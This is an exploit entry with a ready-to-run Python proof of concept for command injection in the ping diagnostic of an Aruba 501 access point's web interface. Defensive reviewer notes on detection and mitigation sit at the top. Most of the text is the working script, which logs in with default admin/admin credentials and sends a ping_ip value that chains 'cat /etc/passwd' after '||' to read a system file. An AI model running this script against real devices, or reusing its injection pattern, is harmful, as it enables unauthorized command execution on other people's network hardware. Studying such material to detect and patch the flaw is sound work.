Headline
Aruba 501 CN12G5W0XX Remote Command Execution
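Aruba 501 version CN12G5W0XX suffers from a remote command execution vulnerability. The proof of concept below logs in to the web interface first (it defaults to admin/admin), so exploitation as shown requires valid credentials for the management interface.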
# Exploit Title: Remote Command Execution | Aruba 501
# Date: 17-07-2024
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.hpe.com
# Version: Aruba 501 CN12G5W0XX
# Tested on: Linux
#
# Reviewer notes (defensive reading of this proof of concept):
#   * Class of bug: OS command injection in the "ping" diagnostic of the web
#     management interface. The `ping_ip` form field carries a shell operator
#     (`||`) followed by a command, which suggests the device passes the field
#     to a shell without validating that it is an IP address.
#   * Precondition: the request is sent on an authenticated session. The
#     script falls back to admin/admin, so devices that still use default
#     credentials are the ones this works against as written.
#   * Detection: look for POSTs to /admin.cgi?action=ping whose `ping_ip`
#     value is not a plain IP address or hostname (shell metacharacters such
#     as `|`, `;`, `&`, backticks or `$(`), and for responses from that
#     endpoint whose headers carry unexpected text.
#   * Mitigation: change default credentials, restrict the management
#     interface to an administration network, and apply the vendor's firmware
#     update if one is available (the page does not name a fixed version).
import requests
from requests.auth import HTTPBasicAuth


def get_input(prompt, default_value):
    """Prompt the operator and return the answer, or *default_value* if empty."""
    entered = input(prompt)
    return entered or default_value


base_url = input("Enter the base URL: ")
if not base_url:
    print("Base URL is required.")
    exit(1)

# Both prompts fall back to the default credential pair admin/admin.
username = get_input("Enter the username (default: admin): ", "admin")
password = get_input("Enter the password (default: admin): ", "admin")

login_url = f"{base_url}/login.cgi"
login_payload = {
    "username": username,
    "password": password,
    "login": "Login",
}
login_headers = {
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": base_url,
    "Connection": "close",
}

session = requests.Session()

# TLS certificate verification is switched off (verify=False below) and the
# resulting warning is silenced, so the device's certificate is never checked.
urllib3 = requests.packages.urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Step 1: authenticate; the session object keeps whatever cookies are issued.
response = session.post(
    login_url,
    headers=login_headers,
    data=login_payload,
    verify=False,
)

# The login is treated as failed on any non-200 status or when the body
# contains the text "login failed" (case-insensitive).
if response.status_code != 200 or "login failed" in response.text.lower():
    print("Login failed. Please check the credentials and try again.")
else:
    print("Login successful!")

    # Step 2: submit the ping form. The injected part follows the `||`
    # operator appended to the address in the `ping_ip` field.
    command = "cat /etc/passwd"
    ping_ip = f"4.2.2.4||{command}"

    exploit_url = f"{base_url}/admin.cgi?action=ping"
    data = {
        "ping_ip": ping_ip,
        "ping_timeout": "1",
        "textareai": "",
        "ping_start": "Ping",
    }
    headers = {
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": base_url,
        "Referer": f"{base_url}/admin.cgi?action=ping",
        "Connection": "close",
    }

    response = session.post(exploit_url, headers=headers, data=data, verify=False)

    # Success heuristic: the string "root" appears in some response header
    # value, i.e. the command output is reflected in the HTTP headers.
    output_reflected = any("root" in value for value in response.headers.values())
    if output_reflected:
        print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")
        print(response.headers)
    else:
        print("Exploit failed. The response headers did not contain the expected output.")

# Headers of the last response received (login or ping) are always printed.
print(response.headers)